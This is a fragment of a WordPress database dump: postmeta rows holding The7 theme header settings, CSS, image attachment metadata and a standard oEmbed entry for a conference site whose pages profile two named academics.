(29809,3928,'_dt_fancy_header_subtitle_color_mode','color'),
(29810,3928,'_dt_fancy_header_subtitle_color','#ffffff'),
(29811,3928,'_dt_fancy_header_bg_heading',''),
(29812,3928,'_dt_fancy_header_bg_color','#222222'),
(29813,3928,'_dt_fancy_header_bg_image_origin','custom'),
(29814,3928,'_dt_fancy_header_bg_image','a:0:{}'),
(29815,3928,'_dt_fancy_header_bg_repeat','no-repeat'),
(29816,3928,'_dt_fancy_header_bg_position_x','center'),
(29817,3928,'_dt_fancy_header_bg_position_y','center'),
(29818,3928,'_dt_fancy_header_bg_fullscreen','1'),
(29819,3928,'_dt_fancy_header_bg_overlay','0'),
(29820,3928,'_dt_fancy_header_overlay_color','#000'),
(29821,3928,'_dt_fancy_header_bg_overlay_opacity','50'),
(29822,3928,'_dt_fancy_header_scroll_effect','default'),
(29823,3928,'_dt_fancy_header_bg_parallax','0.5'),
(29824,3928,'_dt_fancy_header_responsiveness_heading',''),
(29825,3928,'_dt_fancy_header_responsiveness','disabled'),
(29826,3928,'_dt_fancy_header_responsiveness_switch','778px'),
(29827,3928,'_dt_fancy_header_responsive_height','70'),
(29828,3928,'_dt_fancy_header_responsive_font_size','30'),
(29829,3928,'_dt_fancy_header_responsive_title_line_height','38'),
(29830,3928,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(29831,3928,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(29832,3928,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(29833,3928,'_dt_teammate_options_go_to_single','1'),
(29834,3928,'_dt_teammate_options_position',''),
(29835,3928,'_dt_teammate_options_website',''),
(29836,3928,'_dt_teammate_options_mail',''),
(29837,3928,'_dt_teammate_options_facebook',''),
(29838,3928,'_dt_teammate_options_twitter',''),
(29839,3928,'_dt_teammate_options_dribbble',''),
(29840,3928,'_dt_teammate_options_you-tube',''),
(29841,3928,'_dt_teammate_options_rss',''),
(29842,3928,'_dt_teammate_options_delicious',''),
(29843,3928,'_dt_teammate_options_flickr',''),
(29844,3928,'_dt_teammate_options_lastfm',''),
(29845,3928,'_dt_teammate_options_linkedin',''),
(29846,3928,'_dt_teammate_options_vimeo',''),
(29847,3928,'_dt_teammate_options_tumbler',''),
(29848,3928,'_dt_teammate_options_pinterest',''),
(29849,3928,'_dt_teammate_options_devian',''),
(29850,3928,'_dt_teammate_options_skype',''),
(29851,3928,'_dt_teammate_options_github',''),
(29852,3928,'_dt_teammate_options_instagram',''),
(29853,3928,'_dt_teammate_options_stumbleupon',''),
(29854,3928,'_dt_teammate_options_behance',''),
(29855,3928,'_dt_teammate_options_px-500',''),
(29856,3928,'_dt_teammate_options_tripedvisor',''),
(29857,3928,'_dt_teammate_options_vk',''),
(29858,3928,'_dt_teammate_options_foursquare',''),
(29859,3928,'_dt_teammate_options_xing',''),
(29860,3928,'_dt_teammate_options_weibo',''),
(29861,3928,'_dt_teammate_options_odnoklassniki',''),
(29862,3928,'_dt_teammate_options_research-gate',''),
(29863,3928,'_dt_teammate_options_yelp',''),
(29864,3928,'_dt_teammate_options_blogger',''),
(29865,3928,'_dt_teammate_options_soundcloud',''),
(29866,3928,'_dt_teammate_options_viber',''),
(29867,3928,'_dt_teammate_options_whatsapp',''),
(29868,3928,'_dt_teammate_options_reddit',''),
(29869,3928,'_dt_teammate_options_snapchat',''),
(29870,3928,'_dt_teammate_options_telegram',''),
(29871,3928,'the7_fancy_title_css','.fancy-header {\n  background-image: none;\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(29872,3932,'_wp_attached_file','2023/03/ex.jpg'),
(29873,3932,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:672;s:6:\"height\";i:669;s:4:\"file\";s:14:\"2023/03/ex.jpg\";s:8:\"filesize\";i:182221;s:5:\"sizes\";a:3:{s:6:\"medium\";a:5:{s:4:\"file\";s:14:\"ex-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:26672;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:14:\"ex-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7406;}s:6:\"awb_sm\";a:5:{s:4:\"file\";s:14:\"ex-500x498.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:498;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:64779;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(29874,3933,'_wp_attached_file','2023/03/ex-1.jpg'),
(29875,3933,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:570;s:6:\"height\";i:586;s:4:\"file\";s:16:\"2023/03/ex-1.jpg\";s:8:\"filesize\";i:173181;s:5:\"sizes\";a:3:{s:6:\"medium\";a:5:{s:4:\"file\";s:16:\"ex-1-292x300.jpg\";s:5:\"width\";i:292;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:27498;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:16:\"ex-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7973;}s:6:\"awb_sm\";a:5:{s:4:\"file\";s:16:\"ex-1-500x514.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:514;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:72969;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(29876,2920,'_oembed_dcb6baca802614e56eb0d77f29dd70f8','<blockquote class=\"wp-embedded-content\" data-secret=\"fkgYGzkhR9\"><a href=\"https://gsw2023.com/\">GSW2023</a></blockquote><iframe class=\"wp-embedded-content\" sandbox=\"allow-scripts\" security=\"restricted\" style=\"position: absolute; clip: rect(1px, 1px, 1px, 1px);\" title=\"&#8220;GSW2023&#8221; &#8212; Gsw2023\" src=\"https://gsw2023.com/embed/#?secret=RKWTxQB5DM#?secret=fkgYGzkhR9\" data-secret=\"fkgYGzkhR9\" width=\"600\" height=\"338\" frameborder=\"0\" marginwidth=\"0\" marginheight=\"0\" scrolling=\"no\"></iframe>'),
(29877,2920,'_oembed_time_dcb6baca802614e56eb0d77f29dd70f8','1679542095'),
(29878,3934,'_wp_attached_file','2023/03/man.png'),
(29879,3934,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1244;s:6:\"height\";i:920;s:4:\"file\";s:15:\"2023/03/man.png\";s:8:\"filesize\";i:467689;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:15:\"man-300x222.png\";s:5:\"width\";i:300;s:6:\"height\";i:222;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:62497;}s:5:\"large\";a:5:{s:4:\"file\";s:16:\"man-1024x757.png\";s:5:\"width\";i:1024;s:6:\"height\";i:757;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:449664;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:15:\"man-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:26559;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:15:\"man-768x568.png\";s:5:\"width\";i:768;s:6:\"height\";i:568;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:316075;}s:6:\"awb_sm\";a:5:{s:4:\"file\";s:15:\"man-500x370.png\";s:5:\"width\";i:500;s:6:\"height\";i:370;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:149447;}s:6:\"awb_md\";a:5:{s:4:\"file\";s:15:\"man-800x592.png\";s:5:\"width\";i:800;s:6:\"height\";i:592;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:338985;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(29880,3936,'_wp_attached_file','2023/03/man-1.png'),
(29881,3936,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1244;s:6:\"height\";i:920;s:4:\"file\";s:17:\"2023/03/man-1.png\";s:8:\"filesize\";i:467708;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:17:\"man-1-300x222.png\";s:5:\"width\";i:300;s:6:\"height\";i:222;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:62483;}s:5:\"large\";a:5:{s:4:\"file\";s:18:\"man-1-1024x757.png\";s:5:\"width\";i:1024;s:6:\"height\";i:757;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:449622;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:17:\"man-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:26559;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:17:\"man-1-768x568.png\";s:5:\"width\";i:768;s:6:\"height\";i:568;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:316055;}s:6:\"awb_sm\";a:5:{s:4:\"file\";s:17:\"man-1-500x370.png\";s:5:\"width\";i:500;s:6:\"height\";i:370;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:149422;}s:6:\"awb_md\";a:5:{s:4:\"file\";s:17:\"man-1-800x592.png\";s:5:\"width\";i:800;s:6:\"height\";i:592;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:338966;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(29882,3943,'_edit_lock','1688949637:1'),
(29883,3943,'_edit_last','1'),
(29884,3943,'_dt_sidebar_position','disabled'),
(29885,3943,'_dt_sidebar_widgetarea_id','sidebar_1'),
(29886,3943,'_dt_sidebar_hide_on_mobile','0'),
(29887,3943,'_dt_footer_show','1'),
(29888,3943,'_dt_footer_widgetarea_id','sidebar_2'),
(29889,3943,'_dt_footer_hide_on_mobile','0'),
(29890,3943,'_dt_header_title','fancy'),
(29891,3943,'_dt_header_background','normal'),
(29892,3943,'_dt_header_background_below_slideshow','disabled'),
(29893,3943,'_dt_header_transparent_bg_color_scheme','light'),
(29894,3943,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(29895,3943,'_dt_header_transparent_top_bar_bg_opacity','25'),
(29896,3943,'_dt_header_transparent_bg_color','#000000'),
(29897,3943,'_dt_header_transparent_bg_opacity','50'),
(29898,3943,'_dt_header_disabled_background','normal'),
(29899,3943,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(29900,3943,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(29901,3943,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(29902,3943,'_dt_header_disabled_transparent_bg_color','#000000'),
(29903,3943,'_dt_header_disabled_transparent_bg_opacity','50'),
(29904,3943,'_dt_page_overrides_top_margin',''),
(29905,3943,'_dt_page_overrides_right_margin',''),
(29906,3943,'_dt_page_overrides_bottom_margin',''),
(29907,3943,'_dt_page_overrides_left_margin',''),
(29908,3943,'_dt_mobile_page_padding_top',''),
(29909,3943,'_dt_mobile_page_padding_right',''),
(29910,3943,'_dt_mobile_page_padding_bottom',''),
(29911,3943,'_dt_mobile_page_padding_left',''),
(29912,3943,'_dt_fancy_header_layout_heading',''),
(29913,3943,'_dt_fancy_header_title_aligment','center'),
(29914,3943,'_dt_fancy_header_height','300'),
(29915,3943,'_dt_fancy_header_padding-top','0px'),
(29916,3943,'_dt_fancy_header_padding-bottom','0px'),
(29917,3943,'_dt_fancy_header_breadcrumbs_heading',''),
(29918,3943,'_dt_fancy_header_breadcrumbs','disabled'),
(29919,3943,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(29920,3943,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(29921,3943,'_dt_fancy_header_title_heading',''),
(29922,3943,'_dt_fancy_header_title_mode','generic'),
(29923,3943,'_dt_fancy_header_title','Prof. Dr.  Yousry S. Elgamal'),
(29924,3943,'_dt_fancy_header_title_font_size','30'),
(29925,3943,'_dt_fancy_header_title_line_height','36'),
(29926,3943,'_dt_fancy_header_text_transform','none'),
(29927,3943,'_dt_fancy_header_title_color_mode','color'),
(29928,3943,'_dt_fancy_header_title_color','#ffffff'),
(29929,3943,'_dt_fancy_header_subtitle_heading',''),
(29930,3943,'_dt_fancy_header_subtitle',''),
(29931,3943,'_dt_fancy_header_subtitle_font_size','18'),
(29932,3943,'_dt_fancy_header_subtitle_line_height','26'),
(29933,3943,'_dt_fancy_header_subtitle_text_transform','none'),
(29934,3943,'_dt_fancy_header_subtitle_color_mode','color'),
(29935,3943,'_dt_fancy_header_subtitle_color','#ffffff'),
(29936,3943,'_dt_fancy_header_bg_heading',''),
(29937,3943,'_dt_fancy_header_bg_color','#222222'),
(29938,3943,'_dt_fancy_header_bg_image_origin','custom'),
(29939,3943,'_dt_fancy_header_bg_image','a:0:{}'),
(29940,3943,'_dt_fancy_header_bg_repeat','no-repeat'),
(29941,3943,'_dt_fancy_header_bg_position_x','center'),
(29942,3943,'_dt_fancy_header_bg_position_y','center'),
(29943,3943,'_dt_fancy_header_bg_fullscreen','1'),
(29944,3943,'_dt_fancy_header_bg_overlay','0'),
(29945,3943,'_dt_fancy_header_overlay_color','#000'),
(29946,3943,'_dt_fancy_header_bg_overlay_opacity','50'),
(29947,3943,'_dt_fancy_header_scroll_effect','default'),
(29948,3943,'_dt_fancy_header_bg_parallax','0.5'),
(29949,3943,'_dt_fancy_header_responsiveness_heading',''),
(29950,3943,'_dt_fancy_header_responsiveness','disabled'),
(29951,3943,'_dt_fancy_header_responsiveness_switch','778px'),
(29952,3943,'_dt_fancy_header_responsive_height','70'),
(29953,3943,'_dt_fancy_header_responsive_font_size','30'),
(29954,3943,'_dt_fancy_header_responsive_title_line_height','38'),
(29955,3943,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(29956,3943,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(29957,3943,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(29958,3943,'_dt_teammate_options_go_to_single','1'),
(29959,3943,'_dt_teammate_options_position',''),
(29960,3943,'_dt_teammate_options_website',''),
(29961,3943,'_dt_teammate_options_mail',''),
(29962,3943,'_dt_teammate_options_facebook',''),
(29963,3943,'_dt_teammate_options_twitter',''),
(29964,3943,'_dt_teammate_options_dribbble',''),
(29965,3943,'_dt_teammate_options_you-tube',''),
(29966,3943,'_dt_teammate_options_rss',''),
(29967,3943,'_dt_teammate_options_delicious',''),
(29968,3943,'_dt_teammate_options_flickr',''),
(29969,3943,'_dt_teammate_options_lastfm',''),
(29970,3943,'_dt_teammate_options_linkedin',''),
(29971,3943,'_dt_teammate_options_vimeo',''),
(29972,3943,'_dt_teammate_options_tumbler',''),
(29973,3943,'_dt_teammate_options_pinterest',''),
(29974,3943,'_dt_teammate_options_devian',''),
(29975,3943,'_dt_teammate_options_skype',''),
(29976,3943,'_dt_teammate_options_github',''),
(29977,3943,'_dt_teammate_options_instagram',''),
(29978,3943,'_dt_teammate_options_stumbleupon',''),
(29979,3943,'_dt_teammate_options_behance',''),
(29980,3943,'_dt_teammate_options_px-500',''),
(29981,3943,'_dt_teammate_options_tripedvisor',''),
(29982,3943,'_dt_teammate_options_vk',''),
(29983,3943,'_dt_teammate_options_foursquare',''),
(29984,3943,'_dt_teammate_options_xing',''),
(29985,3943,'_dt_teammate_options_weibo',''),
(29986,3943,'_dt_teammate_options_odnoklassniki',''),
(29987,3943,'_dt_teammate_options_research-gate',''),
(29988,3943,'_dt_teammate_options_yelp',''),
(29989,3943,'_dt_teammate_options_blogger',''),
(29990,3943,'_dt_teammate_options_soundcloud',''),
(29991,3943,'_dt_teammate_options_viber',''),
(29992,3943,'_dt_teammate_options_whatsapp',''),
(29993,3943,'_dt_teammate_options_reddit',''),
(29994,3943,'_dt_teammate_options_snapchat',''),
(29995,3943,'_dt_teammate_options_telegram',''),
(29996,3943,'the7_fancy_title_css','.fancy-header {\n  background-image: none;\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(29997,3945,'_wp_attached_file','2023/03/dr-Yousry.bmp'),
(29998,3945,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:166;s:6:\"height\";i:200;s:4:\"file\";s:21:\"2023/03/dr-Yousry.bmp\";s:8:\"filesize\";i:100054;s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(29999,3943,'_thumbnail_id','3945'),
(30000,3948,'_edit_lock','1680420702:1'),
(30001,3949,'_wp_attached_file','2023/03/dr-saleh.bmp'),
(30002,3949,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:176;s:6:\"height\";i:176;s:4:\"file\";s:20:\"2023/03/dr-saleh.bmp\";s:8:\"filesize\";i:92982;s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(30003,3948,'_thumbnail_id','3949'),
(30004,3948,'_edit_last','1'),
(30005,3948,'_dt_sidebar_position','disabled'),
(30006,3948,'_dt_sidebar_widgetarea_id','sidebar_1'),
(30007,3948,'_dt_sidebar_hide_on_mobile','0'),
(30008,3948,'_dt_footer_show','1'),
(30009,3948,'_dt_footer_widgetarea_id','sidebar_2'),
(30010,3948,'_dt_footer_hide_on_mobile','0'),
(30011,3948,'_dt_header_title','fancy'),
(30012,3948,'_dt_header_background','normal'),
(30013,3948,'_dt_header_background_below_slideshow','disabled'),
(30014,3948,'_dt_header_transparent_bg_color_scheme','light'),
(30015,3948,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(30016,3948,'_dt_header_transparent_top_bar_bg_opacity','25'),
(30017,3948,'_dt_header_transparent_bg_color','#000000'),
(30018,3948,'_dt_header_transparent_bg_opacity','50'),
(30019,3948,'_dt_header_disabled_background','normal'),
(30020,3948,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(30021,3948,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(30022,3948,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(30023,3948,'_dt_header_disabled_transparent_bg_color','#000000'),
(30024,3948,'_dt_header_disabled_transparent_bg_opacity','50'),
(30025,3948,'_dt_page_overrides_top_margin',''),
(30026,3948,'_dt_page_overrides_right_margin',''),
(30027,3948,'_dt_page_overrides_bottom_margin',''),
(30028,3948,'_dt_page_overrides_left_margin',''),
(30029,3948,'_dt_mobile_page_padding_top',''),
(30030,3948,'_dt_mobile_page_padding_right',''),
(30031,3948,'_dt_mobile_page_padding_bottom',''),
(30032,3948,'_dt_mobile_page_padding_left',''),
(30033,3948,'_dt_fancy_header_layout_heading',''),
(30034,3948,'_dt_fancy_header_title_aligment','center'),
(30035,3948,'_dt_fancy_header_height','300'),
(30036,3948,'_dt_fancy_header_padding-top','0px'),
(30037,3948,'_dt_fancy_header_padding-bottom','0px'),
(30038,3948,'_dt_fancy_header_breadcrumbs_heading',''),
(30039,3948,'_dt_fancy_header_breadcrumbs','disabled'),
(30040,3948,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(30041,3948,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(30042,3948,'_dt_fancy_header_title_heading',''),
(30043,3948,'_dt_fancy_header_title_mode','custom'),
(30044,3948,'_dt_fancy_header_title','Dr. Saleh Mesbah Elkaffas'),
(30045,3948,'_dt_fancy_header_title_font_size','30'),
(30046,3948,'_dt_fancy_header_title_line_height','36'),
(30047,3948,'_dt_fancy_header_text_transform','none'),
(30048,3948,'_dt_fancy_header_title_color_mode','color'),
(30049,3948,'_dt_fancy_header_title_color','#ffffff'),
(30050,3948,'_dt_fancy_header_subtitle_heading',''),
(30051,3948,'_dt_fancy_header_subtitle',''),
(30052,3948,'_dt_fancy_header_subtitle_font_size','18'),
(30053,3948,'_dt_fancy_header_subtitle_line_height','26'),
(30054,3948,'_dt_fancy_header_subtitle_text_transform','none'),
(30055,3948,'_dt_fancy_header_subtitle_color_mode','color'),
(30056,3948,'_dt_fancy_header_subtitle_color','#ffffff'),
(30057,3948,'_dt_fancy_header_bg_heading',''),
(30058,3948,'_dt_fancy_header_bg_color','#222222'),
(30059,3948,'_dt_fancy_header_bg_image_origin','custom'),
(30060,3948,'_dt_fancy_header_bg_image','a:0:{}'),
(30061,3948,'_dt_fancy_header_bg_repeat','no-repeat'),
(30062,3948,'_dt_fancy_header_bg_position_x','center'),
(30063,3948,'_dt_fancy_header_bg_position_y','center'),
(30064,3948,'_dt_fancy_header_bg_fullscreen','1'),
(30065,3948,'_dt_fancy_header_bg_overlay','0'),
(30066,3948,'_dt_fancy_header_overlay_color','#000'),
(30067,3948,'_dt_fancy_header_bg_overlay_opacity','50'),
(30068,3948,'_dt_fancy_header_scroll_effect','default'),
(30069,3948,'_dt_fancy_header_bg_parallax','0.5'),
(30070,3948,'_dt_fancy_header_responsiveness_heading',''),
(30071,3948,'_dt_fancy_header_responsiveness','enabled'),
(30072,3948,'_dt_fancy_header_responsiveness_switch','778px'),
(30073,3948,'_dt_fancy_header_responsive_height','70'),
(30074,3948,'_dt_fancy_header_responsive_font_size','30'),
(30075,3948,'_dt_fancy_header_responsive_title_line_height','38'),
(30076,3948,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(30077,3948,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(30078,3948,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(30079,3948,'_dt_teammate_options_go_to_single','1'),
(30080,3948,'_dt_teammate_options_position',''),
(30081,3948,'_dt_teammate_options_website',''),
(30082,3948,'_dt_teammate_options_mail',''),
(30083,3948,'_dt_teammate_options_facebook',''),
(30084,3948,'_dt_teammate_options_twitter',''),
(30085,3948,'_dt_teammate_options_dribbble',''),
(30086,3948,'_dt_teammate_options_you-tube',''),
(30087,3948,'_dt_teammate_options_rss',''),
(30088,3948,'_dt_teammate_options_delicious',''),
(30089,3948,'_dt_teammate_options_flickr',''),
(30090,3948,'_dt_teammate_options_lastfm',''),
(30091,3948,'_dt_teammate_options_linkedin',''),
(30092,3948,'_dt_teammate_options_vimeo',''),
(30093,3948,'_dt_teammate_options_tumbler',''),
(30094,3948,'_dt_teammate_options_pinterest',''),
(30095,3948,'_dt_teammate_options_devian',''),
(30096,3948,'_dt_teammate_options_skype',''),
(30097,3948,'_dt_teammate_options_github',''),
(30098,3948,'_dt_teammate_options_instagram',''),
(30099,3948,'_dt_teammate_options_stumbleupon',''),
(30100,3948,'_dt_teammate_options_behance',''),
(30101,3948,'_dt_teammate_options_px-500',''),
(30102,3948,'_dt_teammate_options_tripedvisor',''),
(30103,3948,'_dt_teammate_options_vk',''),
(30104,3948,'_dt_teammate_options_foursquare',''),
(30105,3948,'_dt_teammate_options_xing',''),
(30106,3948,'_dt_teammate_options_weibo',''),
(30107,3948,'_dt_teammate_options_odnoklassniki',''),
(30108,3948,'_dt_teammate_options_research-gate',''),
(30109,3948,'_dt_teammate_options_yelp',''),
(30110,3948,'_dt_teammate_options_blogger',''),
(30111,3948,'_dt_teammate_options_soundcloud',''),
(30112,3948,'_dt_teammate_options_viber',''),
(30113,3948,'_dt_teammate_options_whatsapp',''),
(30114,3948,'_dt_teammate_options_reddit',''),
(30115,3948,'_dt_teammate_options_snapchat',''),
(30116,3948,'_dt_teammate_options_telegram',''),
